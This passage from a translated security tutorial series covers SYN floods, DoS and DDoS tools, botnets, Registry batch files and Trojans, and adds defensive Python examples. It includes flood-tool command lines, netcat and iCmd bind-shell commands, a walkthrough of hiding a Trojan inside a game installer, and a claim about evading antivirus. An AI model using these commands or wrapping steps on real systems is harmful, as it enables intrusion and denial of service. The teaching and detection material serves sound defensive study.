    - The attacker sends bogus TCP SYN requests to the server under attack. To handle these SYN packets the system has to set aside some memory for each connection.

    - When a very large number of bogus SYN packets reach the server, they use up all of its capacity to process requests. A normal user connecting to the server starts with a TCP SYN request, and at that point the server can no longer answer, so the connection is not made.

    - This is an attack in which the attacker abuses TCP's three-way communication process.

    - Malicious code can generate an extremely large number of TCP SYN packets towards the server under attack, with the source IP address of the packets altered. That is the DoS attack.

    - The upper figure shows normal communication with the server; the lower one shows the server under attack: a great many SYN packets arrive while the server's capacity to reply is limited, and the server then refuses legitimate access.

    - The TCP three-way handshake works as follows when machine A wants to communicate with machine B: (1) machine A sends a TCP SYN packet to machine B; (2) on receiving the SYN from A, machine B sends machine A an ACK packet accepting the connection; (3) machine A sends machine B an ACK packet and data exchange begins.

    - Machine A and machine B hold the connection for at least 75 seconds, then perform another TCP three-way handshake for the next session in which to exchange data.

    - Unfortunately attackers abuse this gap to use up the system's resources: they reduce the time between three-way handshake requests to a very small value and do not send back the ACK packet. They keep sending SYN packets continuously for a period of time and never answer the SYN&ACK packet from the machine under attack.

    - A rule that accepts a SYN packet from any one machine only once every 75 seconds, and moves any IP address that violates it into a deny-access rule, will block this attack.
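    The 75-second rule above, together with the half-open connections it is meant to limit, as an added example that is not part of the original article. It replays a constructed log of client-to-server TCP packets, applies the per-source rule, and separately counts connections that sent SYN but never the final ACK. The packet tuples, the addresses (documentation ranges), the function names and the backlog limit of 128 are assumptions.

```python
from collections import defaultdict, deque

WINDOW = 75.0        # seconds, the interval used by the rule on this page
BACKLOG_LIMIT = 128  # assumed alert threshold for half-open connections

def per_source_rule(packets, max_syn=1, window=WINDOW):
    """The page's rule: a source sending more than max_syn SYNs inside
    `window` seconds goes onto the deny list."""
    recent = defaultdict(deque)   # source IP -> times of its recent SYNs
    denied = set()
    for ts, src, _sport, flags in packets:
        if flags != "S":
            continue
        q = recent[src]
        while q and ts - q[0] >= window:
            q.popleft()           # forget SYNs older than the window
        q.append(ts)
        if len(q) > max_syn:
            denied.add(src)
    return denied

def half_open_peak(packets, timeout=WINDOW):
    """Peak number of connections that sent SYN but not yet the final ACK."""
    pending = {}                  # (source IP, source port) -> SYN time
    peak = 0
    for ts, src, sport, flags in packets:
        for key in [k for k, t in pending.items() if ts - t >= timeout]:
            del pending[key]      # entry timed out on the server
        if flags == "S":
            pending[(src, sport)] = ts
        elif flags == "A":
            pending.pop((src, sport), None)   # handshake completed
        peak = max(peak, len(pending))
    return peak

def assess(packets, backlog_limit=BACKLOG_LIMIT):
    """Apply both checks to a log of (time, src_ip, src_port, flags) tuples."""
    packets = sorted(packets)
    peak = half_open_peak(packets)
    return {
        "denied": per_source_rule(packets),
        "half_open_peak": peak,
        "backlog_alert": peak > backlog_limit,
    }

# Constructed logs. "S" = SYN from the client, "A" = the client's final ACK.
NORMAL = [
    (0.0, "192.0.2.10", 40000, "S"), (0.1, "192.0.2.10", 40000, "A"),
    (1.0, "192.0.2.11", 40001, "S"), (1.2, "192.0.2.11", 40001, "A"),
]
# 200 SYNs with altered source addresses, one per address, never completed.
SPOOFED = [(2.0 + i * 0.01, f"198.51.100.{i + 1}", 1024 + i, "S")
           for i in range(200)]
# 50 SYNs from one unchanged source address, never completed.
SINGLE = [(10.0 + i * 0.1, "203.0.113.9", 5000 + i, "S") for i in range(50)]

if __name__ == "__main__":
    for name, log in (("normal", NORMAL),
                      ("single source", NORMAL + SINGLE),
                      ("altered sources", NORMAL + SPOOFED)):
        print(name, assess(log))
```

    On the log with altered source addresses every source sends a single SYN, so the per-source rule denies nothing while the half-open count reaches 200. With max_syn=1 the rule also denies any legitimate client that opens two connections within 75 seconds.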

    IV. DoS attack tools

    - Jolt2

    - Bubonic.c

    - Land and LaTierra

    - Targa

    - Blast20

    - Nemesy

    - Panther2

    - Crazy Pinger

    - Some Trouble

    - UDP Flood

    - FSMax

    1. DoS tool: Jolt2

    - Lets an attacker carry out a denial of service (DoS) against Windows-based systems.

    - It causes the CPU of the server under attack to run at 100% all the time, so the CPU cannot handle other services.

    - Systems that are not Windows-based, such as Cisco routers and some other routers, can also have this vulnerability and be attacked by this tool.

    2. DoS tool: Bubonic.c

    - Bubonic.c is a DoS tool based on vulnerabilities in Windows 2000.

    - It works by sending TCP packets at random with random settings, which makes the server spend a great deal of resources handling them, and vulnerabilities appear as a result.

    - Bubonic.c is used by typing the command: bubonic 12.23.23.2 10.0.0.1 100

    3. DoS tool: Land and LaTierra

    - IP address spoofing combined with the process of opening a connection between two computers.

    - Both IP addresses, source and destination, are changed to the one address of the destination. If this attack occurs while a connection between machine A and machine B is being established, the connection between A and B is broken.

    - This happens because the packet's source IP address and destination IP address are the same, so the packet cannot reach the destination it should reach.

    4. DoS tool: Targa

    - Targa is a program that can use 8 different forms of DoS attack.

    - It is regarded as a kit that integrates all the effects of DoS, and it often comes in the form of Rootkit versions.

    - The attacker uses one specific attack method after another against a system until the goal is achieved.

    - Targa is a powerful program and can create very great danger for a company's network.

    5. DoS tool: Blast 2.0

    - Blast is very small. It is a tool for testing the capacity of a TCP service: it can generate a very large volume of TCP packets and may endanger a network with weak servers.

    - Below is how Blast2.0 is used to attack an HTTP server:

    + Blast 192.168.1.219 80 40 50 /b GET /some /e url/ HTTP/1.0 /nr /dr /v

    - Attacking a POP server:

    + Blast 192.168.1.219 110 15 20 /b user te /e d /v

    6. DoS tool: Nemesys

    - This program generates random packets (random protocol, port, size, etc.).

    - Using this program an attacker can run dangerous code on a computer that is not secured.

    7. DoS tool: Panther2

    - A denial-of-service attack built on UDP Attack, designed specifically for 28.8 to 56 Kbps connections.

    - It can take up the entire bandwidth of such a connection.

    - It can consume network bandwidth by several methods, for example by pinging extremely fast, and can cause a DoS attack.

    8. DoS tool: Crazy Pinger

    - This tool can send large ICMP packets to a remote network.

    9. DoS tool: Some Trouble

    - SomeTrouble 1.0 is a program that congests a network.

    - SomeTrouble is a very simple program with three components:

    + Mail Bomb (can itself resolve names for the mail addresses it has)

    + ICQ Bomb

    + Net Send Flood

    10. DoS tool: UDP Flood

    - UDPFlood is a program that sends UDP packets.

    - It sends UDP packets out to an IP address and a port that is not fixed.

    - The packets can carry a piece of text, or an amount of data that is generated randomly or taken from a file.

    - It is used to test a server's capacity to respond.

    11. DoS tool: FSMAX

    - Tests a server's response performance.

    - It creates a file and then runs it on the server many times over, repeatedly and at once.

    - The effect of this tool is to try to overflow a buffer and carry out a DoS attack on the server.

    V. Conclusion of part I

    - Using a DoS attack tool against a server sometimes has no effect on the server. Suppose you use a Ping of Death tool against a server that is connected to the network at 100Mbps while you connect to it at 3Mbps: your attack achieves nothing.

    - But imagine 1000 people like you attacking that server at the same moment. Their combined bandwidth reaches at most 3Gbps while the server's connection speed is 100 Mbps. You can imagine the result.

    - In part II of this series I will present the definition of BOT and BOTNET, how botnets are built and how they are used, so that we understand how they work and can find the most effective solutions against DDoS attacks.

    By Tocbatdat, Vnexperts Research Department

    In this next part of the article on DoS and DDoS attacks I present bot networks in detail: the kinds of bot network and how a botnet is created. Once you understand botnets you can picture how a DDoS attack is carried out. In this part II I also present the DDoS attack methods in detail and how they are carried out. These articles are only meant to give you a deeper understanding of DDoS attacks; the tools are mentioned for introduction only, because they are old DDoS tools.

    VI. BOT NET networks

    1. The significance of a BOT network

    - Using a DoS attack tool against a server sometimes has no effect on the server. Suppose you use a Ping of Death tool against a server that is connected to the network at 100Mbps while you connect to it at 3Mbps: your attack achieves nothing.

    - But imagine 1000 people like you attacking that server at the same moment. Their combined bandwidth reaches at most 3Gbps while the server's connection speed is 100 Mbps. You can imagine the result.

    - So how would I get 1000 computers connected to the network? Buy a thousand machines and rent 1000 subscriber lines? I certainly would not do that, and no attacker uses that method either.

    - The attacker builds a network of thousands of Internet-connected computers (there are BOT networks of up to 400,000 machines). How are attackers able to take advantage of people connected to the Internet to build a BOT network? In this article I introduce BOT networks, how they are built, and the tools used to build them.

    - With a BOT network in hand, the attacker uses simple attack tools against a computer system. The bots make requests that are entirely legitimate to the system and all use one service of the server at the same moment. Imagine an attacker who controls 400,000 machines and orders them all to download a file from your website at once. That is DDoS: Distributed Denial of Service.

    - There is no method that stops DDoS attacks completely, but in this article I also introduce methods of defending against DDoS once we understand it.

    2. BOT networks

    - BOT is short for RoBOT.

    - An IRCbot is also called a zombie or drone.

    - Internet Relay Chat (IRC) is a form of real-time data transmission over the Internet. It is designed so that one person can send messages to a group, and people communicate with one another over different channels, called Channels.

    - First the BOT connects to an IRC channel on an IRC server and waits for communication between people.

    - The attacker can control the BOT network and use it for some purpose.

    - Many BOT networks connected together are called a BOTNET (botnet).

    3. Botnets

    - A botnet consists of many computers.

    - It is used for DDoS attacks.

    - A small botnet may consist of only 1000 computers, but imagine each of them connected to the Internet at just 128Kbps: the botnet can already generate 1000*128 ~ 100Mbps of bandwidth. That is a figure that hardly any hosting provider can allot to each of its websites.

    4. What botnets are used for

    - Distributed Denial-of-Service (DDoS) attacks

    + Botnets are used for DDoS attacks.

    - Spamming

    + Opening a SOCKS v4/v5 proxy server for spamming.

    - Sniffing traffic

    + A bot can also act as a packet sniffer (capturing communication on the network). After capturing packets it tries to decode them to extract meaningful content such as bank accounts and much other valuable user information.

    - Keylogging

    + With the help of a keylogger, a great deal of sensitive user information can be exploited by the attacker, such as e-banking accounts and many other accounts.

    - Installing and spreading malicious programs

    + A botnet can be used to create new BOT networks.

    - Installing pop-up advertisements

    + Unwanted advertisements pop up automatically in front of the user.

    - Google Adsense abuse

    + Automatically changing the search results shown whenever the user uses Google's search service. With the results changed, the user is tricked into clicking on dangerous websites.

    - Attacks on IRC chat networks

    + This is called a clone attack.

    - Phishing

    + Botnets are also used to send phishing mail in order to obtain users' sensitive information.

    5. Kinds of BOT

    Agobot/Phatbot/Forbot/XtremBot

    - These bots are written in C++, are cross-platform, and their source code is available under the GPL. Agobot was written by Ago, known by the nickname Wonk, a young German who was arrested in May 2004 on computer crime charges.

    - Agobot can use NTFS Alternate Data Streams (ADS) and acts like a kind of rootkit to hide processes running on the system.

    SDBot/Rbot/UrBot/UrXbot

    - SDBot is written in C and was also published under the GPL. It is regarded as the predecessor of Rbot, RxBot, UrBot, UrXBot and JrBot.

    mIRC-Based Bots: GT-Bots

    - GT stands for the two words Global Threat, and the name is commonly used for all mIRC-scripted bots. They can use the IM software mIRC to set up a number of scripts and other pieces of code.

    6. The steps in building a botnet; how to analyze a bot network

    To understand better how a botnet is built, we look at how one computer gets infected, how a bot network is formed, and how that network is used to attack a target, taking a botnet made of Agobots as the case.

    Step 1: How a computer is infected

    - First the attacker tricks the user into running the file "chess.exe". An Agobot usually copies itself into the system and adds entries to the Registry to make sure it runs with the system at startup. The Registry has locations for applications that run at startup:

    HKLM\Software\Microsoft\Windows\CurrentVersion\Run

    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

    Step 2: How it spreads and builds the BOTNET

    - Once one computer in a network is infected with Agobot, it automatically searches for other computers in the network and infects them using weaknesses in resources shared on the network.

    - It usually tries to connect to the default shares intended for administration (administrator or administrative), for example C$, D$, E$ and print$, by guessing usernames and passwords in order to gain access to another system and infect it.

    - Agobot can spread very quickly because it is able to take advantage of weaknesses in the Windows operating system and in the applications and services running on the system.

    Step 3: Connecting to IRC

    - In the next step Agobot creates an IRC-controlled backdoor to open what it needs and connects to the botnet through the IRC control channel. After connecting it opens the required services so that, on request, it can be controlled by the attacker through the IRC communication channel.

    Step 4: Controlling attacks from the botnet

    - The attacker directs the machines in the Agobot network to download .exe files and run them.

    - Collects all relevant and needed information on the system that the attacker wants.

    - Runs other files on the system as the attacker requires.

    - Runs DDoS programs to attack other systems.

    7. Diagram of how systems are infected and used by Agobot

    VII. DDoS attack tools

    1. Nuclear Bot

    - Nuclear Bot is a very powerful "Multi Advanced IRC BOT" tool that can be used for Floods, Managing, Utilities, Spread, IRC Related, DDoS attacks and many other purposes.

    VIII. DDoS attacks

    On the Internet, a Distributed Denial of Service attack is an attack from many computers against one target that causes the legitimate requests of normal users to be refused. By generating an enormous number of packets towards a specific target, it can produce a state similar to the system being shut down.

    1. Characteristics of DDoS attacks

    - The attack comes from a very large set of computers on the Internet, and usually relies on services available on the computers in the botnet.

    - The attack services are controlled from the "primary victims", while the compromised computers in the bot network that are used to attack are usually called "secondary victims".

    - It is a form of attack that is very hard to detect, because it originates from many IP addresses on the Internet.

    - If one IP address attacks a company, it can be blocked by a firewall. If the attack comes from 30,000 different IP addresses, that is extremely difficult.

    - A perpetrator can do a lot of damage with a DoS attack, and it becomes more dangerous still when a bot network on the Internet is used to carry out the DoS attack. That is called a DDoS attack.

    2. DDoS attacks cannot be stopped completely

    - DDoS attacks involve searching for vulnerabilities on Internet-connected computers and exploiting them to build a botnet of many Internet-connected computers.

    - Once a DDoS attack is under way, it is very hard to stop completely.

    - Packets arriving at the firewall can be blocked, but most of them come from IP addresses that are not yet in the firewall's access rules, and they are entirely valid packets.

    - If the source address of the packets may be spoofed, then once you receive no response from the real source addresses you need to block communication with that source address.

    - However, a botnet comprises from thousands to several hundred thousand IP addresses on the Internet, which makes stopping the attack extremely difficult.

    3. Smart attackers

    Nowadays no attacker uses their own IP address directly to control the botnet that attacks the target; they usually work through an intermediary. The DDoS attack models are:

    a. Agent Handler Model

    The attacker uses handlers to control the attack.

    b. IRC-based DDoS attack

    The attacker uses IRC networks to control, amplify and manage connections with the computers in the botnet.

    IX. Classification of DDoS attacks

    - Attacks that exhaust the bandwidth available for reaching the server

    + Flood attack

    + UDP and ICMP flood

    - Attacks that amplify communication

    + Smurf and Fraggle attack

    The DDoS attack on Yahoo.com in 2000

    Diagram: classification of DDoS attacks

    Diagram: a DDoS attack of the communication-amplification type

    As you know, a Smurf attack pings the broadcast address of some network with the source address set to the address of the machine to be attacked, so that all the reply packets are delivered to the IP address of the machine under attack.

    X. Reflective DNS attacks

    1. Issues relating to Reflective DNS attacks

    - A hacker can use a botnet to send a very large number of requests to DNS servers.

    - Those requests flood the network bandwidth of the DNS servers.

    - To defend against this form of attack, a firewall can be used to block communication from the computers that have been identified.

    - But blocking communication from a DNS server raises major problems. A DNS server has a very important role on the Internet.

    - Blocking DNS communication amounts to preventing normal users from sending mail and accessing websites.

    - A DNS request typically takes 1/73 of the time of the reply packet on the server. Because of this, using a professional tool to multiply the requests sent to a DNS server will overload the server so that it can no longer respond to normal users.

    2. Reflective DNS attack tool: ihateperl.pl

    - ihateperl.pl is a very small, very effective program based on the DNS-Reflective type of attack.

    - It uses a list of DNS servers to flood a network with name resolution request packets.

    - For example, it can use google.com as the name to resolve in the requests sent to the servers, and the domain name can be changed to www.vnexperts.net or any website the attacker wants.

    - Using the tool is very simple: you create a list of DNS servers, pass in the IP address of the individual machine, and set the number of connections.

    XI. Tools used for DDoS attacks

    Almost all of the tools I introduce in this article are old and ineffective. They are included for teaching purposes only, so that you can understand this form of DDoS attack better. The DDoS attack tools are:

    - Trinoo - Tribe flood Network (TFN) - TFN2K - Stacheldraht

    - Shaft

    - Trinity - Knight - Mstream - Kaiten

    These tools can be downloaded free of charge on the Internet. Note that they are for trial only: they are weak tools and serve only as a demo of DDoS attacks.

    Part VI. Editing the Registry from the command line and its security applications

    1. The role of the command line

    2. Creating a .bat file that runs a series of operations automatically

    3. Configuring the REGISTRY with file.bat

    4. Applications of REGISTRY configuration

    5. Conclusion

    1. The role of the command line

    - Every system administrator has to use the command-line interface of the operating systems they manage. On Windows the command line is used too, and it brings convenience and flexibility to administration.

    2. Creating a file.bat that runs a series of operations automatically

    - When commands are run from a file.bat, many commands can be executed one after another.

    - Example 1: use Notepad to write the content below and save it as file.bat:

    When this file.bat is run, the system will (1) create a user named tocbatdat, (2) add the user to the Administrators group, (3) set the DHCP Client service to Disabled, (4) stop the DHCP Client service, and (5) restart the machine immediately. (The NET, SC and Shutdown commands all have options; type the command followed by /? to display them.)

    Some frequently used commands:

    NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] lets you create users and groups and view the computer's network access information.

    NETSH lets you set every network-related parameter, such as the IP address, DNS and routing.

    WMIC provides a great many options for managing the computer.

    - Example 2: create a file.bat whose purpose is to produce a file containing the computer's configuration:

    A file.bat with the content above produces a file, c.txt, containing: the IP configuration, the running processes, the users on the computer, the open ports, the running services, general system information, and the directory structure of drive C. A single file.bat can therefore collect a great deal of information about a computer.

    3. Configuring the REGISTRY with file.bat

    To configure the Registry we need a way to carry out two tasks:

    Step 1: create a file.reg with the desired content from the command line

    Step 2: run the file.reg that was just created

    Example 3: we need to create a file.reg with the following content:

    To create a file.reg with the content above, use a file.bat like this:

    What tasks does a file.bat with the content above perform?

    Step 1: Create a file.bat with the desired content, as in the first part of the example

    Step 2: Run the file.reg that was just created

    Step 3: Delete all the files that were created

    The result of creating and running a file.bat with this content is that a key is added to the Registry.

    Example 4: Having added a key, I now want to delete a key from the Registry. What should the content of the file.bat be?

    What tasks does a file.bat with the content above perform?

    Step 1: Create file.reg with the desired content. The second line selects a folder. A Registry folder contains many keys, but I only want to delete the one key TOCBATDAT, which is what the third line is for. The fourth line deletes an entire folder in the Registry.

    Step 2: Run file.reg

    Step 3: Delete all the files that were created.

    Conclusion: in this section 3 I have shown how to edit (add, modify, delete) the Registry from the command line, in particular with a file.bat.
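    Because one line in a file.reg can delete a single entry and another can delete a whole folder, it is worth listing what a file.reg will do before it is imported. The following is an added example, not the author's file.bat or file.reg: it parses the .reg text format and reports every change. The key paths and the function names parse_reg and destructive are hypothetical; only the name TOCBATDAT comes from the text above.

```python
import re

# Constructed sample .reg file. The key paths are hypothetical; only the
# value name TOCBATDAT comes from the page.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor]
"TOCBATDAT"="demo"
"Blob"=hex:01,02,\
  03,04

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Settings]
"TOCBATDAT"=-
@="default text"

; a leading minus inside the brackets removes the key and everything below it
[-HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Old]
'''

HEADERS = ("Windows Registry Editor Version 5.00", "REGEDIT4")
KEY_RE = re.compile(r'^\[(-?)(HKEY_[^\]]+)\]$')
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def parse_reg(text):
    """Return (action, key, value_name) for every change a .reg file makes."""
    lines = text.lstrip("\ufeff").splitlines()
    if not lines or lines[0].strip() not in HEADERS:
        raise ValueError("missing .reg header line")
    ops, key, key_deleted, pending = [], None, False, ""
    for raw in lines[1:]:
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):            # hex data continues on the next line
            pending = line[:-1]
            continue
        if not line or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
        if m:
            key, key_deleted = m.group(2), m.group(1) == "-"
            ops.append(("delete-key" if key_deleted else "ensure-key", key, None))
            continue
        m = VALUE_RE.match(line)
        if not m or key is None or key_deleted:
            raise ValueError("unexpected line: %r" % line)
        name = "(Default)" if m.group(1) == "@" else m.group(1)[1:-1]
        action = "delete-value" if m.group(2).strip() == "-" else "set-value"
        ops.append((action, key, name))
    return ops


def destructive(ops):
    """The deletions a reviewer should confirm before the file is imported."""
    return [op for op in ops if op[0].startswith("delete")]


if __name__ == "__main__":
    for op in destructive(parse_reg(SAMPLE_REG)):
        print(op)
```

    In .reg terms the "folder" of the text is a key and the "key" is a named value: `"Name"=-` removes one value, while `[-KEY]` removes the key with all its values and subkeys.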

    4. Applications of REGISTRY configuration

    The Registry is where all the settings of a Windows system are stored.

    Example 5: Uninstalling any program. First we need to understand what uninstalling a program actually involves:

    - Step 1: stop the process and stop the services

    - Step 2: Delete everything related to the program from the Registry

    - Step 3: Delete the program's data in Program Files

    For step 1: to stop a process use the command Taskkill /F /IM Processname; to stop a service use net stop servicename; to disable a service use sc config servicename start= disabled

    For step 2: section 3 showed how to delete a folder or a key in the Registry, so we can carry out step 2 of the uninstall. Uninstalling a program completely requires finding all of that program's keys and folders in the Registry. As a result, removing a large program such as Microsoft Office this way is extremely difficult. From my own experience, writing a file.bat to remove the Symantec software took 3 days because it had 500 keys in the Registry that needed to be deleted.

    For step 3: to delete a file use the command del file /f /q. To delete every file in a folder use del c:\folder\* /f /q

    Combining all the steps in one file.bat makes it possible to do everything in one go.

    Example 6: Preventing a file from being able to run on the computer.

    This example lets us create a file.bat that stops a virus from running on our machine.

    In essence this uses Group Policy, under Software Restriction, rules, hash rule. But Group Policy is only a graphical interface for editing the Registry, so we can edit the Registry directly to achieve the same thing.

    5. Conclusion

    Using a file.bat to configure the Registry is valuable for studying security and for understanding the system in more depth. In particular, when these file.bat files are converted into file.exe they are never treated as viruses.

    Part VII. Backdoors and Trojans: the complete guide

    In this article I will cover Trojans and backdoors: the basic concepts, how they are classified, and how they spread, together with related topics such as using a few basic Trojans and how a Trojan is hidden inside an .exe file. Finally, I will present measures for defending against Trojans and backdoors.

    1. Introduction to Trojans

    2. Types of Trojan and how they work

    3. How to recognise a computer infected with a Trojan

    4. Differences between Trojans

    5. Using some Trojans to attack

    6. Binding one or more Trojans into a normal .EXE file

    7. How to detect Trojans and backdoors

    8. Measures against Trojans and backdoors

    9. Conclusion

    1. Introduction to Trojans.

    - A Trojan is a small program that runs hidden and harms the computer.

    - With the help of a Trojan, an attacker can easily access the victim's computer to carry out harmful actions such as stealing data, deleting files, and much more.

    2. Types of Trojan and how they work

    - The attacker can access computers infected with Trojans whenever they are online.

    - The attacker can access and control the victim's entire computer and can use it for many different purposes.

    - The basic types of Trojan:

    + Remote Access Trojans: give the attacker full remote control of the system.

    + Data-Sending Trojans: send sensitive information to the attacker.

    + Destructive Trojans: destroy the system.

    + Denial-of-Service (DoS) attack Trojans: Trojans used for DoS attacks.

    + Proxy Trojans

    + HTTP, FTP Trojans: the Trojan sets itself up as an HTTP or FTP server that the attacker then exploits.

    + Security Software Disable Trojans: turn off the security features on the victim's computer.

    - The aims of people who write Trojans:

    + Obtaining credit card information

    + Obtaining personal account details such as e-mail addresses, passwords, usernames, ...

    + Confidential data.

    + Financial information: bank accounts, ...

    + Using the victim's computer to carry out some task, such as attacking, scanning, or flooding the victim's network.

    3. Ways a victim's computer becomes infected with a Trojan.

    - Through online chat applications such as IRC (Internet Relay Chat)

    - Through files attached to e-mail

    - Through physical media, such as exchanging data via USB, CD, HDD

    - By running a file infected with a Trojan

    - Through NetBIOS file sharing

    - Through dangerous programs

    - From untrusted websites or websites that offer free software

    - A Trojan can hide inside a normal application; running the application immediately runs the Trojan as well.

    4. Ways to recognise a computer infected with a Trojan (the most basic signs; they may not be accurate).

    - The CD-ROM drive opens and closes by itself.

    - Strange things appear on the screen.

    - The background of Windows windows changes.

    - Documents print by themselves.

    - The computer changes fonts and other settings by itself.

    - The desktop wallpaper changes by itself and cannot be changed back.

    - The left and right mouse buttons are swapped.

    - The mouse pointer is not shown on the screen.

    - The Start button is not shown.

    - Some chat windows pop up.

    Ports used by common Trojans.

    - Back Orifice: UDP, ports 31337 and 31338

    - Deep Throat: UDP, ports 2140 and 3150

    - NetBus: TCP, ports 12345 and 12346

    - Whack-a-mole: TCP, ports 12361 and 12362

    - Netbus 2 Pro: TCP, port 20034

    - GirlFriend: TCP, port 21544

    - Masters Paradise: TCP, ports 3129, 40421, 40422, 40423 and 40426.

    To see which ports are active on the computer, use the command: netstat -an

    5. Using some types of Trojan

    The purpose of this article is to help you understand Trojans, and using Trojans is one of the basic topics of security research. Once you know how the various Trojans are used and how they work, you can devise network security measures for your own organisation and for our important data. In this section I introduce the following Trojans:

    - Tini

    - iCmd

    - Netcat

    - HTTP RAT

    a. Tini Trojan

    Any computer infected with this Trojan accepts Telnet connections on port 7777 without any authentication.

    - To infect a system this Trojan only needs to be run once (or Enter pressed on the file); everything is then in place and it waits for Telnet connections on port 7777.

    - With tini.exe run on the machine 192.168.1.33, I can now sit at any machine and use the command Telnet 192.168.1.33 7777 to get a console on that machine.

    b. iCmd Trojan

    This is similar to the Tini Trojan, with one difference: it lets you choose the port to telnet to and a password for accessing the infected machine.

    Example: the infected machine runs iCmd.exe with the command

    - iCmd.exe vne 8080

    This means the machine enables telnet on port 8080 with the password vne.

    In this example I placed iCmd.exe in the folder vnexperts.net on drive C:\

    - From another machine I can telnet to this machine with the command:

    - Telnet port

    - For the example above I type: telnet 192.168.1.33 8080

    The system asks me for the password; I type vne and press Enter.

    And the result:

    c. Netcat Trojan.

    This Trojan offers quite a few options, such as the port, running hidden, allowing telnet, and so on.

    To run this Trojan I type the command:

    Nc.exe -L -p -t -e

    -L runs in listening mode

    -p is the port to listen on.

    -t allows Telnet to be used

    -e runs a given program.

    In this example I ran the command

    - Nc.exe -L -p 8800 -t -e cmd.exe

    Now I can sit at any machine and telnet to this machine on port 8800, and control that computer completely through the command-line interface.

    d. HTTP RAT

    This works as a pre-programmed web server that lets the computer be managed through a web interface. It works over the Internet as well: when a machine is infected, the Trojan automatically sends you an e-mail, as set in its configuration.

    Now, from any machine, you can get into this machine through the window of any web browser:

    http://192.168.1.33

    I can run, delete or download any file on the victim's machine.

    e. ICMP Trojan

    It uses ICMP as its tunnel, which almost any firewall or system permits.

    - On the victim machine, which acts as the ICMP Trojan server, we have to install this Trojan with the command

    - From any machine, you use ICMPsend to connect remotely to the system infected with the ICMP Trojan.

    In practice there are many other kinds of Trojan, which you can read about on security-focused websites; in this article I only demo a few Trojans used for training.

    6. How one or more Trojans are hidden in an .exe file or other normal executable

    The sections above covered the basic use of Trojans. Suppose you want to use the iCmd.exe Trojan: what do you have to do? Copy the file to the machine and run it with the command iCmd.exe vne 8800? That is not possible, because nobody will let you sit at that machine.

    So how does this Trojan get onto the victim's machine?

    Unfortunately, clever attackers hide one or more Trojans inside a normal .exe file, such as a board game, a Windows installer .exe, or the executable of a free program; sometimes they are even hidden in the installers of antivirus programs.

    The technique for hiding a Trojan in an .exe file is called a wrapper. Commonly used software:

    - One file EXE Maker

    - Yet Another Binder

    - Pretator Wrapper.

    a. Using One file EXE Maker to hide and run iCmd.exe

    Download the installer for this software, install it, and then run it to bind the files.

    The EXE file I chose is a very popular Caro (five-in-a-row) game, Fiver6_8.exe.

    - The Caro game file is set to run normally

    - iCmd.exe is set to run hidden and to be copied into the system

    - For the additional command on iCmd.exe I chose vne 8800, which allows telnet on port 8800 with the password vne.

    Click Save to complete the process.

    - I saved it under the name caro.exe

    Looking at the file sizes I see:

    - iCmd.exe is 36KB

    - Fiver6_8_en.exe is 310K

    - Caro.exe, created from the two files above, is 353KB

    Now I try running Caro.exe

    Only the Caro game window opens, but an iCmd.exe process is also running; checking in Task Manager:

    From any machine I can connect remotely to this machine on port 8800 with the password vne

    In this article I only demo one program for hiding an EXE file; you can find such software on the Internet.

    7. How to detect a Trojan.

    Three principles apply to any Trojan program:

    - To operate, a Trojan has to listen for requests on some port

    - A running program has to have a NAME in the process list

    - A Trojan program always starts when the computer starts up.

    a. Detecting ports used by Trojans

    - Use the command netstat -an in Windows to find out which ports the system is listening on

    + In the figure below we see port 7777, which turns out to be the Tini Trojan's port

    + My machine does not use any port 8800, so why is it in the listening state with a machine connected to it? It must belong to a Trojan.

    - Use the Fport software

    - Use the TCPView software

    Fortunately, I can see every port in use and which program is using which port.

    From here I can check my network services, and any suspicious ports can be closed with a firewall.
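    The check described in 7a can be automated: compare the listeners in netstat -an output against the Trojan ports listed earlier and against the listeners the host is expected to have. This is an added example, not part of the original article; the sample output, the peer address 192.168.1.50, the EXPECTED baseline and the function names are constructed for illustration.

```python
# Ports the page lists for common Trojans, plus port 7777 from its Tini demo.
KNOWN_TROJAN_PORTS = {
    "Back Orifice": ("UDP", (31337, 31338)),
    "Deep Throat": ("UDP", (2140, 3150)),
    "NetBus": ("TCP", (12345, 12346)),
    "Whack-a-mole": ("TCP", (12361, 12362)),
    "Netbus 2 Pro": ("TCP", (20034,)),
    "GirlFriend": ("TCP", (21544,)),
    "Masters Paradise": ("TCP", (3129, 40421, 40422, 40423, 40426)),
    "Tini": ("TCP", (7777,)),
}
PORT_INDEX = {(proto, port): name
              for name, (proto, ports) in KNOWN_TROJAN_PORTS.items()
              for port in ports}

# Constructed sample of Windows `netstat -an` output (192.168.1.50 is made up).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8800           0.0.0.0:0              LISTENING
  TCP    192.168.1.33:139       0.0.0.0:0              LISTENING
  TCP    192.168.1.33:8800      192.168.1.50:1046      ESTABLISHED
  TCP    [::]:135               [::]:0                 LISTENING
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:31337          *:*
"""

# Listeners this host is expected to have (an assumption made for the sample).
EXPECTED = {("TCP", 135), ("TCP", 139), ("TCP", 445), ("UDP", 137)}


def parse_netstat(text):
    """Return (proto, local_port, remote, state) for each TCP/UDP row."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue
        port = fields[1].rpartition(":")[2]
        if port.isdigit():
            state = fields[3] if len(fields) > 3 else ""   # UDP rows have no state
            rows.append((fields[0], int(port), fields[2], state))
    return rows


def review_listeners(text, expected=EXPECTED):
    """Flag listeners on a listed Trojan port or outside the baseline."""
    rows = parse_netstat(text)
    findings, seen = [], set()
    for proto, port, _remote, state in rows:
        listening = proto == "UDP" or state == "LISTENING"
        if not listening or (proto, port) in seen:
            continue
        seen.add((proto, port))
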